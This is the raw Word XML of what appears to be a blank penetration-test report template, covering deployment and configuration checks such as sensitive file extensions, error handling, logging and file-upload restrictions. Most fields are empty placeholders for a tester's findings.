                <w:numId w:val="4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3411D3F" w14:textId="77777777" w:rsidR="001749A3" w:rsidRPr="001749A3" w:rsidRDefault="001749A3" w:rsidP="001749A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70315" w:rsidRPr="001749A3" w14:paraId="35305D49" w14:textId="77777777" w:rsidTr="0041645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6A1AA4A" w14:textId="1C0CA090" w:rsidR="00F70315" w:rsidRPr="001749A3" w:rsidRDefault="00F70315" w:rsidP="0041645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A7B6B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AI Tools Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B78683D" w14:textId="5C3621B0" w:rsidR="00F70315" w:rsidRDefault="00F70315" w:rsidP="00F7031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C030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[*ShellGPT, </w:t>
            </w:r>
            <w:r w:rsidR="00A66A7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Microsoft Copilot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, </w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4543C147" w14:textId="77777777" w:rsidR="00F70315" w:rsidRDefault="00F70315" w:rsidP="00F7031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30EADDB" w14:textId="77777777" w:rsidR="00F70315" w:rsidRPr="001749A3" w:rsidRDefault="00F70315" w:rsidP="00F7031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70315" w:rsidRPr="001749A3" w14:paraId="0557CBE7" w14:textId="77777777" w:rsidTr="00416458">
        <w:trPr>
          <w:trHeight w:val="260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5685CD4" w14:textId="14361485" w:rsidR="00F70315" w:rsidRPr="00BA7B6B" w:rsidRDefault="00F70315" w:rsidP="0041645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B6A7F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Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BDDD3F" w14:textId="77777777" w:rsidR="00F70315" w:rsidRDefault="00F70315" w:rsidP="00F7031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3DDBD2A" w14:textId="77777777" w:rsidR="00F70315" w:rsidRDefault="00F70315" w:rsidP="00F7031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FBDF474" w14:textId="77777777" w:rsidR="00F70315" w:rsidRPr="002C030C" w:rsidRDefault="00F70315" w:rsidP="00F7031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70315" w:rsidRPr="001749A3" w14:paraId="0DD9AB3F" w14:textId="77777777" w:rsidTr="00416458">
        <w:trPr>
          <w:trHeight w:val="305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F11AE84" w14:textId="728B4B3A" w:rsidR="00F70315" w:rsidRPr="004B6A7F" w:rsidRDefault="00F70315" w:rsidP="0041645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3422B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Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64D1EAE0" w14:textId="77777777" w:rsidR="00F70315" w:rsidRDefault="00F70315" w:rsidP="00F7031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42C887C" w14:textId="77777777" w:rsidR="00F70315" w:rsidRDefault="00F70315" w:rsidP="00F7031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B7CF995" w14:textId="77777777" w:rsidR="00F70315" w:rsidRDefault="00F70315" w:rsidP="00F7031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47F7843" w14:textId="77777777" w:rsidR="00F70315" w:rsidRDefault="00F70315" w:rsidP="00F7031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460BA59" w14:textId="77777777" w:rsidR="00F70315" w:rsidRDefault="00F70315" w:rsidP="00F7031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</w:tbl>
    <w:p w14:paraId="5B7560DC" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRPr="00A51A96" w:rsidRDefault="00F33C82" w:rsidP="00F33C82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bookmarkStart w:id="5" w:name="_Hlk189066848"/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3C82" w14:paraId="401D66A9" w14:textId="77777777" w:rsidTr="00F16C38">
        <w:trPr>
          <w:trHeight w:val="6020"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4111AC5E" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E0E60D2" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68A54DD9" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28A87DD0" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62EF5154" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="120FE945" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0774C92C" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26564CF1" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57D2769E" w14:textId="77777777" w:rsidR="00F33C82" w:rsidRDefault="00F33C82" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="5"/>
    </w:tbl>
    <w:p w14:paraId="20181F17" w14:textId="77777777" w:rsidR="00505C3E" w:rsidRDefault="00505C3E" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FEAB4C3" w14:textId="021253FD" w:rsidR="009A67AF" w:rsidRDefault="009A67AF" w:rsidP="009A67AF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="009A67AF">
        <w:lastRenderedPageBreak/>
        <w:t>Test 3: Test for Vulnerabilities in Application Deployment and Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D8E1C0" w14:textId="224CCCD9" w:rsidR="001A0715" w:rsidRDefault="001B6A96" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019220E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[*</w:t>
      </w:r>
      <w:r w:rsidR="00BA581F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="0019220E" w:rsidRPr="0019220E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>is section</w:t>
      </w:r>
      <w:r w:rsidR="00BA581F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00903320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>includes</w:t>
      </w:r>
      <w:r w:rsidR="00BA581F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD5D4C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>various</w:t>
      </w:r>
      <w:r w:rsidR="00FD5D4C" w:rsidRPr="00FD5D4C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> security checks </w:t>
      </w:r>
      <w:r w:rsidR="00FD5D4C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">and techniques </w:t>
      </w:r>
      <w:r w:rsidR="00FD5D4C" w:rsidRPr="00FD5D4C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>performed on the application's deployment and configuration to identify potential misconfigurations and vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="002B35B9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0019220E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A92E1A" w14:textId="77777777" w:rsidR="00A724AE" w:rsidRPr="0019220E" w:rsidRDefault="00A724AE" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr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A724AE" w:rsidRPr="00A51A96" w14:paraId="3F502BDF" w14:textId="77777777" w:rsidTr="001B083E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="292659CF" w14:textId="2865DAF6" w:rsidR="00A724AE" w:rsidRPr="003C713F" w:rsidRDefault="00A724AE" w:rsidP="0085194C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3.1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B6263B" w:rsidRPr="00B6263B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Application Platform Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CA16488" w14:textId="77777777" w:rsidR="0019220E" w:rsidRPr="00941BC1" w:rsidRDefault="0019220E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B6263B" w:rsidRPr="001749A3" w14:paraId="4D7B282B" w14:textId="77777777" w:rsidTr="00941BC1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393634A" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263B" w:rsidP="00941BC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749A3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5854EFAA" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263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6263B" w:rsidRPr="001749A3" w14:paraId="511A18D9" w14:textId="77777777" w:rsidTr="00941BC1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8C0EA8B" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263B" w:rsidP="00941BC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749A3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6BF27FB4" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263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6263B" w:rsidRPr="001749A3" w14:paraId="4CAD4A52" w14:textId="77777777" w:rsidTr="00941BC1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1380B6E" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263B" w:rsidP="00941BC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749A3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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E1B698F" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263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25FE4" w:rsidRPr="001749A3" w14:paraId="5E01C303" w14:textId="77777777" w:rsidTr="00941BC1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80C1756" w14:textId="3836E898" w:rsidR="00425FE4" w:rsidRPr="001749A3" w:rsidRDefault="00425FE4" w:rsidP="00941BC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25FE4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Sample Files &amp; Known Directories Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C5CB73B" w14:textId="77777777" w:rsidR="00425FE4" w:rsidRDefault="00425FE4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425FE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[*Default files, installation leftovers, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E0A53B" w14:textId="77777777" w:rsidR="00425FE4" w:rsidRDefault="00425FE4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FE58003" w14:textId="77777777" w:rsidR="00425FE4" w:rsidRDefault="00425FE4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2E81F33" w14:textId="0D5EF04F" w:rsidR="00425FE4" w:rsidRPr="00425FE4" w:rsidRDefault="00425FE4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C44937" w:rsidRPr="001749A3" w14:paraId="09586402" w14:textId="77777777" w:rsidTr="00941BC1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9436162" w14:textId="3DC6264D" w:rsidR="00C44937" w:rsidRPr="00425FE4" w:rsidRDefault="00C44937" w:rsidP="00941BC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44937">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Sensitive HTML Comments Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30B2AF01" w14:textId="77777777" w:rsidR="00C44937" w:rsidRDefault="00C44937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C4493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Examples if found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5D03D9E" w14:textId="77777777" w:rsidR="00C44937" w:rsidRDefault="00C44937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E7324F2" w14:textId="77777777" w:rsidR="00C44937" w:rsidRDefault="00C44937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8FBA793" w14:textId="669511F8" w:rsidR="00C44937" w:rsidRPr="00425FE4" w:rsidRDefault="00C44937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A376F7" w:rsidRPr="001749A3" w14:paraId="22051766" w14:textId="77777777" w:rsidTr="00941BC1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2334D82" w14:textId="67582B0C" w:rsidR="00A376F7" w:rsidRPr="00C44937" w:rsidRDefault="00A376F7" w:rsidP="00941BC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376F7">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server Modules &amp; Permissions Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63463B79" w14:textId="77777777" w:rsidR="00A376F7" w:rsidRDefault="00A376F7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A376F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Unnecessary APIs, Excessive Privileges, Weak File Permissions,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28101D4" w14:textId="77777777" w:rsidR="00A376F7" w:rsidRDefault="00A376F7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E95C9F3" w14:textId="77777777" w:rsidR="00A376F7" w:rsidRDefault="00A376F7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5315E8E" w14:textId="129CD74E" w:rsidR="00A376F7" w:rsidRDefault="00A376F7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A376F7" w:rsidRPr="001749A3" w14:paraId="4C67EAB8" w14:textId="77777777" w:rsidTr="00941BC1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8EEC0FA" w14:textId="5B75A2C6" w:rsidR="00A376F7" w:rsidRPr="00A376F7" w:rsidRDefault="00201326" w:rsidP="00941BC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01326">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Error Handling Observations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72C12160" w14:textId="77777777" w:rsidR="00A376F7" w:rsidRDefault="0020132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20132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Exposure of Stack Traces, Default Error Pages, Debugging Information,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0D7867B" w14:textId="77777777" w:rsidR="00201326" w:rsidRDefault="0020132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B5A0418" w14:textId="77777777" w:rsidR="00201326" w:rsidRDefault="0020132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A6E16A7" w14:textId="010C7D3B" w:rsidR="00201326" w:rsidRDefault="0020132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861FFF" w:rsidRPr="001749A3" w14:paraId="41DFDE9A" w14:textId="77777777" w:rsidTr="00941BC1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DCEF1B6" w14:textId="45F9E33F" w:rsidR="00861FFF" w:rsidRPr="00201326" w:rsidRDefault="00861FFF" w:rsidP="00941BC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61FFF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Logging Configuration Issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="284650F6" w14:textId="77777777" w:rsidR="00861FFF" w:rsidRDefault="00861FFF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861FF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Accessible Logs, Unencrypted Sensitive Data, Logging of Authentication Tokens,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0BC25AB" w14:textId="77777777" w:rsidR="00861FFF" w:rsidRDefault="00861FFF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71BD5A5" w14:textId="117172ED" w:rsidR="00861FFF" w:rsidRDefault="00861FFF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6263B" w:rsidRPr="001749A3" w14:paraId="0481F0AA" w14:textId="77777777" w:rsidTr="00941BC1">
        <w:trPr>
          <w:trHeight w:val="152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4DA942E" w14:textId="5F4A78A7" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00861FFF" w:rsidP="00941BC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="00B6263B" w:rsidRPr="0015588E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20735B4A" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263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6263B" w:rsidRPr="001749A3" w14:paraId="20F14269" w14:textId="77777777" w:rsidTr="00941BC1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7FA67E1" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263B" w:rsidP="00941BC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749A3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2C6FC61B" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263B" w:rsidP="00F53F37">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43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70FC975" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263B" w:rsidP="00F53F37">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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3B06A91" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263B" w:rsidP="00F53F37">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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1F50714" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263B" w:rsidP="00F53F37">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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01D7244" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263B" w:rsidP="00F53F37">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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4B57909" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRPr="001749A3" w:rsidRDefault="00B6263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109E3AE1" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRPr="00A51A96" w:rsidRDefault="00F53F37" w:rsidP="00F53F37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3F37" w14:paraId="61867BBA" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21459006" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRDefault="00F53F37" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04B2F832" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRDefault="00F53F37" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60E84A9D" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRDefault="00F53F37" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4A834892" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRDefault="00F53F37" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2983D338" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRDefault="00F53F37" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="414ADE71" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRDefault="00F53F37" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70445962" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRDefault="00F53F37" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0925F79F" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRDefault="00F53F37" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10993B59" w14:textId="77777777" w:rsidR="00F53F37" w:rsidRDefault="00F53F37" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6924F6DE" w14:textId="77777777" w:rsidR="00B6263B" w:rsidRDefault="00B6263B" w:rsidP="000947B4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84771E" w:rsidRPr="00A51A96" w14:paraId="63E754E8" w14:textId="77777777" w:rsidTr="00CF0903">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="145A3671" w14:textId="3293839B" w:rsidR="0084771E" w:rsidRPr="003C713F" w:rsidRDefault="0084771E" w:rsidP="0085194C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3.2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AC6800" w:rsidRPr="00AC6800">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Handling of File Extensions for Sensitive Information Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62208A62" w14:textId="77777777" w:rsidR="006F6B8A" w:rsidRPr="0046647C" w:rsidRDefault="006F6B8A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533276" w:rsidRPr="001749A3" w14:paraId="1FE29CD0" w14:textId="77777777" w:rsidTr="0046647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5F028B2" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="0046647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749A3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6955E943" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="0053327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33276" w:rsidRPr="001749A3" w14:paraId="09C9EEA1" w14:textId="77777777" w:rsidTr="0046647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3A69980" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="0046647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749A3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395B9758" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="0053327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33276" w:rsidRPr="001749A3" w14:paraId="3C8A7635" w14:textId="77777777" w:rsidTr="0046647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2D439EE" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00533276" w:rsidP="0046647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749A3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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42BF3614" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="0053327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33276" w:rsidRPr="001749A3" w14:paraId="362F77FA" w14:textId="77777777" w:rsidTr="0046647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6E59A09" w14:textId="4322AF35" w:rsidR="00533276" w:rsidRPr="001749A3" w:rsidRDefault="00EF76F8" w:rsidP="0046647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F76F8">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Sensitive File Extensions Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51530962" w14:textId="78487975" w:rsidR="00533276" w:rsidRDefault="0053327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425FE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EF76F8" w:rsidRPr="00EF76F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.inc, .asa, .config, .bak, .zip, .txt, .java, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00425FE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99BE4B1" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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CA1504F" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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392EA34" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="00425FE4" w:rsidRDefault="0053327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33276" w:rsidRPr="001749A3" w14:paraId="4E84E020" w14:textId="77777777" w:rsidTr="0046647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61A764E" w14:textId="163AAA6E" w:rsidR="00533276" w:rsidRPr="00425FE4" w:rsidRDefault="003B158E" w:rsidP="0046647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B158E"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 Exposed Files &amp; Directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="503968EC" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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C4493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Examples if found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57B16BA" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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E23B41D" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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AC18E81" w14:textId="77777777" w:rsidR="00533276" w:rsidRPr="00425FE4" w:rsidRDefault="0053327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33276" w:rsidRPr="001749A3" w14:paraId="2C580A4A" w14:textId="77777777" w:rsidTr="0046647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A970FBA" w14:textId="6F4D9FE3" w:rsidR="00533276" w:rsidRPr="00C44937" w:rsidRDefault="003B158E" w:rsidP="0046647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B158E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Script Execution Allowed in Directories?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7043462F" w14:textId="0DF87D35" w:rsidR="00533276" w:rsidRDefault="0053327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3B158E" w:rsidRPr="003B158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Affected Directories if found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FE85D54" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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0513ADA" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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74BA724" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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33276" w:rsidRPr="001749A3" w14:paraId="34F955D4" w14:textId="77777777" w:rsidTr="0046647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88F7640" w14:textId="41B98871" w:rsidR="00533276" w:rsidRPr="00A376F7" w:rsidRDefault="0037220A" w:rsidP="0046647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7220A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Variation in Load-Balanced Servers Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42B84606" w14:textId="504288B4" w:rsidR="00533276" w:rsidRDefault="0053327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277AF1" w:rsidRPr="00277AF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Configuration Differences if found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26326AD" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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0CF942A" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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673D683" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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33276" w:rsidRPr="001749A3" w14:paraId="146BF589" w14:textId="77777777" w:rsidTr="0046647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C5E719E" w14:textId="5FD66AC0" w:rsidR="00533276" w:rsidRPr="00201326" w:rsidRDefault="00277AF1" w:rsidP="0046647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77AF1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>File Upload Restrictions Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E399ECE" w14:textId="241FD955" w:rsidR="00533276" w:rsidRDefault="0053327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EA0541" w:rsidRPr="00EA054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Bypass Techniques Used, Results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38E0798" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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AC64C5A" w14:textId="77777777" w:rsidR="00533276" w:rsidRDefault="0053327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33276" w:rsidRPr="001749A3" w14:paraId="689B8862" w14:textId="77777777" w:rsidTr="0046647C">
        <w:trPr>
